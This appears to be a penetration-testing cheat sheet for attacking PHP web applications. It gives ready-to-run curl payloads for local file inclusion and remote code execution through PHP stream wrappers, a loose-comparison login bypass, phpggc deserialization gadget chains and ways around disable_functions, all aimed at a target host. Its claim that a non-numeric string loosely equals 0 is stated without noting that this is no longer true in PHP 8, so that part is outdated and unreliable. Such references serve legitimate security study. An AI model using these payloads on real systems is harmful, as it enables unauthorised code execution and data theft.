PHP

What it is: The most common server-side scripting language on the web. Powers WordPress, Drupal, Joomla, and countless custom apps. Misconfigurations and dangerous functions are the main attack vectors.

Vuln research:


Identify PHP version

Check headers, phpinfo, and error pages

curl -sI http://$IP/ | grep -i "x-powered-by"
curl http://$IP/phpinfo.php
curl http://$IP/info.php

PHP wrapper attacks (LFI)

Use PHP stream wrappers to read source code or achieve RCE

# Read source code as base64:
curl "http://$IP/index.php?page=php://filter/convert.base64-encode/resource=config"

# RCE via data wrapper:
curl "http://$IP/index.php?page=data://text/plain,<?php system('id'); ?>"

# RCE via input wrapper (POST body becomes code):
curl -X POST "http://$IP/index.php?page=php://input" -d "<?php system('id'); ?>"

# Expect wrapper:
curl "http://$IP/index.php?page=expect://id"

PHP type juggling

Loose comparison (==) bypass — Authentication bypass

# If login uses: if ($password == $user_input)
# Send password as integer 0:
curl -X POST http://$IP/login.php -d "user=admin&password=0"
# In PHP: "secretpass" == 0 evaluates to TRUE (loose comparison)

PHP deserialization

Unserialize() with user input — Object injection to RCE

# Look for: unserialize($_GET['data']) or similar
# Craft serialized PHP object with magic methods (__wakeup, __destruct)
# Tools: phpggc for generating payloads
phpggc -l                    # List available chains
phpggc Laravel/RCE1 system id  # Generate payload

PHP disable_functions bypass

If dangerous functions are disabled — Techniques to bypass

# Check what's disabled:
curl http://$IP/phpinfo.php | grep disable_functions

# Bypass methods:
# 1. LD_PRELOAD + mail() / putenv()
# 2. FFI (PHP 7.4+)
# 3. pcntl_exec if available
# 4. Chankro tool for automated bypass

Dangerous PHP functions

Functions that enable RCE — Look for these in source code

system()         exec()           shell_exec()
passthru()       popen()          proc_open()
pcntl_exec()     eval()           assert()
preg_replace()   (with /e flag)   create_function()
include()        require()        file_get_contents()